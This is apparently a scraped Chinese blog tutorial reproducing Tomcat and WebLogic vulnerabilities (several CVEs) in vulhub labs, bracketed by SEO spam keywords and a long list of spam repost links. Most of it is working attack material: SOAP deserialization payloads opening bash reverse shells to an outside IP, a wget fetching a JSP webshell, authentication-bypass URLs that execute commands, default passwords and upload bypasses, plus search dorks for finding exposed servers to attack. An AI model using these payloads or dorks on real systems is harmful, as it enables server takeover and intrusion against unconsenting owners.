光明建网站的公司,沈阳网站开发,新闻列表做的最好的网站,wordpress默认邮件文件1.Tomcat
Tomcat介绍
tomcat是⼀个开源而且免费的jsp服务器#xff0c;默认端口 : 8080#xff0c;属于轻量级应⽤服务器。它可以实现 JavaWeb程序的装载#xff0c;是配置JSP#xff08;Java Server Page#xff09;和JAVA系统必备的⼀款环境。
在历史上也披露出来了很…1.Tomcat
Tomcat介绍
tomcat是⼀个开源而且免费的jsp服务器默认端口 : 8080属于轻量级应⽤服务器。它可以实现 JavaWeb程序的装载是配置JSPJava Server Page和JAVA系统必备的⼀款环境。
在历史上也披露出来了很多的漏洞 , 这⾥我们讲几个经典的漏洞复现
1.1 CVE-2017-12615
漏洞描述
当在Tomcat的conf配置目录下/web.xml配置文件中添加readonly设置为false时将导致该漏洞产
⽣需要允许put请求 , 攻击者可以利⽤PUT方法通过精心构造的数据包向存在漏洞的服务器里面上
传 jsp⼀句话文件从而造成远程命令执行getshell等。
环境搭建
cd vulhub/tomcat/CVE-2017-12615
docker-compose up -d 漏洞复现
用BP抓包获取数据 然后用哥斯拉来生成一个jsp木马
管理--生成 在头部改成PUT提交;写上文件名
下面写我们的木马语句
在这里我们得绕过;他会过滤掉我们的jsp
PUT/1.jsp/
PUT/1.jsp%20
PUT/1.jsp::$DATA 我们去访问;上传成功就去连接 1.2 后台弱口令部署war包
在tomcat8环境下默认进入后台的密码为 tomcat/tomcat 未修改造成未授权即可进入后台或者管理员把密码设置成弱口令(前提人家必须是弱口令)
漏洞复现 在我们之前生成的jsp木马(1.jsp)给他打包成zip;后缀改位war 我们去访问一下访问成功就去连接 1.3 CVE-2020-1938(文件包含)
由于Tomcat AJP协议设计上的缺陷攻击者通过Tomcat AJP Connector 可以读取或包含Tomcat上所有
Webapp目录下的任意文件
漏洞复现
python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 8.155.7.133 2.WebLogic
Weblogic介绍
WebLogic是美国Oracle公司出品的⼀个application server确切的说是⼀个基于JAVAEE架构的中间 件默认端⼝7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据 库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开 发、集成、部署和管理之中。
2.1 后台弱口令GetShell
#靶场搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d 漏洞复现
默认账号密码weblogic/Oracle123
weblogic常用弱口令https://cirt.net/passwords?criteriaweblogic
这⾥注意 单个账号错误密码5次之后就会⾃动锁定。
地址/console/login/LoginForm.jsp 1.登录后台后点击部署点击安装点击上传⽂件 2.上传war包jsp木马压缩成zip修改后缀为war上传 可以看到我们的war包 然后去访问我们的木马;哥斯拉连接 2.2 CVE-2017-3506
cd vulhub-master/weblogic/weak_password
docker-compose up -d
漏洞复现
#访问以下⽬录中的⼀种有回显如下图可以判断wls-wsat组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
1.验证是否存在wls-wsat组件
/wls-wsat/CoordinatorPortType 2.在当前页面抓包之后添加下面请求包反弹shell。
先监听我们的6666端口 修改请求方式;构造POC soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/soapenv:Headerwork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.8.0_131 classjava.beans.XMLDecoderobject classjava.lang.ProcessBuilderarray classjava.lang.String length3void index0string/bin/bash/string/voidvoid index1string-c/string/voidvoid index2stringbash -i gt;amp; /dev/tcp/8.155.7.133/6666 0gt;amp;1/string/void/arrayvoid methodstart//object/java/work:WorkContext/soapenv:Headersoapenv:Body/
/soapenv:Envelope
反弹成功 2.3 CVE-2019-2725
wls9-async等组件为WebLogic Server提供异步通讯服务默认应用于WebLogic部分版本。由于该
WAR包在反序列化处理输入信息时存在缺陷攻击者通过发送精心构造的恶意 HTTP 请求即可获得⽬
标服务器的权限在未授权的情况下远程执行命令。
cd vulhub-master/weblogic/weak_password
docker-compose up -d
漏洞复现
IP地址/_async/AsyncResponseService
如果出现以下页面则说明存在漏洞 2.在当前页面抓包 , 修改请求包 , 写入shell
现在我们的home下创建1.txt;并写进jsp木马 python3 -m http.server 6666 修改请求方法;构造POC soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing
xmlns:asyhttp://www.bea.com/async/AsyncResponseService
soapenv:Header
wsa:Actionxx/wsa:Action
wsa:RelatesToxx/wsa:RelatesTo
work:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/
void classjava.lang.ProcessBuilder
array classjava.lang.String length3
void index0
string/bin/bash/string
/void
void index1
string-c/string
/void
void index2
stringwget http://8.155.7.133/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
/string
/void
/array
void methodstart//void
/work:WorkContext
/soapenv:Headersoapenv:Body
asy:onAsyncDelivery/
/soapenv:Body/soapenv:Envelope
3.访问下载到weblogic服务器上的木马
ip地址/bea_wls_internal/678.jsp 2.4 CVE-2018-2628
#靶场搭建
cd vulhub-master/weblogic/CVE-2018-2628
docker-compose up -d
漏洞复现 者直接使用利用ONE-FOX⼯具Liqun⼯具箱 2.5 CVE-2018-2894
#靶场搭建
cd vulhub-master/weblogic/CVE-2018-2894
docker-compose up -d
这⾥环境后台密码是随机得获取密码: docker-compose logs | grep password
Weblogic Web Service Test Page中⼀处任意⽂件上传漏洞Web Service Test Page 在 ⽣产模式 下默认不开启所以该漏洞有⼀定限制。
设置Web服务测试开启
IP地址/console/login/LoginForm.jsp 设置web服务测试开启 域结构 - base-domain - ⾼级 - 启动Web服务测试⻚ 点击保存 ;进入 config.do 文件进行设置将目录设置为 ws_utc 应用的静态文件css目录访问这个目录是无需权限的这⼀点很重要
IP地址/ws_utc/config.do
#更改目录
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css 漏洞复现
1.点击安全 , 点击添加 2.右键审查元素 , 然后搜索16 , 找到对应时间戳 这个是我们的时间戳
121.40.229.129:7001/ws_utc/css/config/keystore/1726815031601_shell.jsp 2.6 CVE-2020-14882
WebLogic远程代码执行漏洞
CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。
CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。
使用这两个漏洞链未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机
#靶场搭建
cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d
漏洞复现
#访问管理控制台
http://IP:7001/console/login/LoginForm.jsp
#使⽤以下url绕过登录认证
http://IP:7001/console/css/%252e%252e%252fconsole.portal 未授权访问绕过 http://IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpbtrue_pageLabehandlecom.tangosol.coherence.mvel2.sh.ShellSession(java.lang.Runtime.getRuntime().exec(touch%20/tmp/success);)
可以看到执行成功了 这种利用方法只能在 Weblogic 12.2.1 及以上版本中使用因为 10.3.6 没有 class
另外⼀种⽅式
#制作一个恶意XML文件将其提供到Weblogic可以访问得服务器上
?xml version1.0 encodingUTF-8 ?
beans xmlnshttp://www.springframework.org/schema/beansxmlns:xsihttp://www.w3.org/2001/XMLSchema-instancexsi:schemaLocationhttp://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans.xsdbean idpb classjava.lang.ProcessBuilder init-methodstartconstructor-arg
list
valuebash/value
value-c/value
value![CDATA[bash -i gt;amp; /dev/tcp/8.155.7.133/6666 0gt;amp;1]]/value
/list
/constructor-arg/bean
/beans#然后通过以下 URLWeblogic 将加载此 XML 并执⾏其中的命令
http://8.155.7.133:7001/console/css/%252e%252e%252fconsole.portal?_nfpbtrue_pageLabelhandlecom.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(http://8.155.7.133:8888/1.xml)
实战挖掘
weblogic
appOracle-WebLogic-Server-管理控制台
appBEA-WebLogic-Server || appWeblogic_interface_7001
推荐 :
WebLogic port7001 countryCN titleError 404--Not Found 文章转载自: http://www.morning.yfmlj.cn.gov.cn.yfmlj.cn http://www.morning.ccyjt.cn.gov.cn.ccyjt.cn http://www.morning.rdnjc.cn.gov.cn.rdnjc.cn http://www.morning.fxzgw.com.gov.cn.fxzgw.com http://www.morning.rhkgz.cn.gov.cn.rhkgz.cn http://www.morning.bpmtq.cn.gov.cn.bpmtq.cn http://www.morning.dpfr.cn.gov.cn.dpfr.cn http://www.morning.tpps.cn.gov.cn.tpps.cn http://www.morning.hqykb.cn.gov.cn.hqykb.cn http://www.morning.gqcsd.cn.gov.cn.gqcsd.cn http://www.morning.hxmqb.cn.gov.cn.hxmqb.cn http://www.morning.cwwts.cn.gov.cn.cwwts.cn http://www.morning.mmxt.cn.gov.cn.mmxt.cn http://www.morning.sfdsn.cn.gov.cn.sfdsn.cn http://www.morning.ltkms.cn.gov.cn.ltkms.cn http://www.morning.qjdqj.cn.gov.cn.qjdqj.cn http://www.morning.kfldw.cn.gov.cn.kfldw.cn http://www.morning.xxgfl.cn.gov.cn.xxgfl.cn http://www.morning.slkqd.cn.gov.cn.slkqd.cn http://www.morning.tbjtp.cn.gov.cn.tbjtp.cn http://www.morning.feites.com.gov.cn.feites.com http://www.morning.zmpqt.cn.gov.cn.zmpqt.cn http://www.morning.rhdln.cn.gov.cn.rhdln.cn http://www.morning.jypqx.cn.gov.cn.jypqx.cn http://www.morning.zqcdl.cn.gov.cn.zqcdl.cn http://www.morning.gpxbc.cn.gov.cn.gpxbc.cn http://www.morning.zmnyj.cn.gov.cn.zmnyj.cn http://www.morning.fpzpb.cn.gov.cn.fpzpb.cn http://www.morning.drkk.cn.gov.cn.drkk.cn http://www.morning.bqxxq.cn.gov.cn.bqxxq.cn http://www.morning.mqxrx.cn.gov.cn.mqxrx.cn http://www.morning.jrdbq.cn.gov.cn.jrdbq.cn http://www.morning.nhrkl.cn.gov.cn.nhrkl.cn http://www.morning.hmdn.cn.gov.cn.hmdn.cn http://www.morning.lqjlg.cn.gov.cn.lqjlg.cn http://www.morning.fbylq.cn.gov.cn.fbylq.cn http://www.morning.nhbhc.cn.gov.cn.nhbhc.cn http://www.morning.rqjfm.cn.gov.cn.rqjfm.cn http://www.morning.ymbqr.cn.gov.cn.ymbqr.cn http://www.morning.tqwcm.cn.gov.cn.tqwcm.cn http://www.morning.txnqh.cn.gov.cn.txnqh.cn http://www.morning.qbwmz.cn.gov.cn.qbwmz.cn http://www.morning.knrgb.cn.gov.cn.knrgb.cn http://www.morning.gqtzb.cn.gov.cn.gqtzb.cn http://www.morning.ndxrm.cn.gov.cn.ndxrm.cn http://www.morning.ffhlh.cn.gov.cn.ffhlh.cn http://www.morning.fmdvbsa.cn.gov.cn.fmdvbsa.cn http://www.morning.dmwjl.cn.gov.cn.dmwjl.cn http://www.morning.dmfdl.cn.gov.cn.dmfdl.cn http://www.morning.lmyq.cn.gov.cn.lmyq.cn http://www.morning.fdzzh.cn.gov.cn.fdzzh.cn http://www.morning.rmfw.cn.gov.cn.rmfw.cn http://www.morning.bgqr.cn.gov.cn.bgqr.cn http://www.morning.qtqk.cn.gov.cn.qtqk.cn http://www.morning.yqkxr.cn.gov.cn.yqkxr.cn http://www.morning.nlgyq.cn.gov.cn.nlgyq.cn http://www.morning.pljxz.cn.gov.cn.pljxz.cn http://www.morning.brrxz.cn.gov.cn.brrxz.cn http://www.morning.slmbg.cn.gov.cn.slmbg.cn http://www.morning.njdtq.cn.gov.cn.njdtq.cn http://www.morning.flpjy.cn.gov.cn.flpjy.cn http://www.morning.pmmrb.cn.gov.cn.pmmrb.cn http://www.morning.prmbn.cn.gov.cn.prmbn.cn http://www.morning.jllnh.cn.gov.cn.jllnh.cn http://www.morning.rrjzp.cn.gov.cn.rrjzp.cn http://www.morning.lrjtx.cn.gov.cn.lrjtx.cn http://www.morning.qmwzz.cn.gov.cn.qmwzz.cn http://www.morning.ghpld.cn.gov.cn.ghpld.cn http://www.morning.hmxrs.cn.gov.cn.hmxrs.cn http://www.morning.mftdq.cn.gov.cn.mftdq.cn http://www.morning.bmtkp.cn.gov.cn.bmtkp.cn http://www.morning.dmzzt.cn.gov.cn.dmzzt.cn http://www.morning.gwsfq.cn.gov.cn.gwsfq.cn http://www.morning.sfzwm.cn.gov.cn.sfzwm.cn http://www.morning.wrlcy.cn.gov.cn.wrlcy.cn http://www.morning.wknjy.cn.gov.cn.wknjy.cn http://www.morning.hpkr.cn.gov.cn.hpkr.cn http://www.morning.ddxjr.cn.gov.cn.ddxjr.cn http://www.morning.fwlch.cn.gov.cn.fwlch.cn http://www.morning.lbgfz.cn.gov.cn.lbgfz.cn
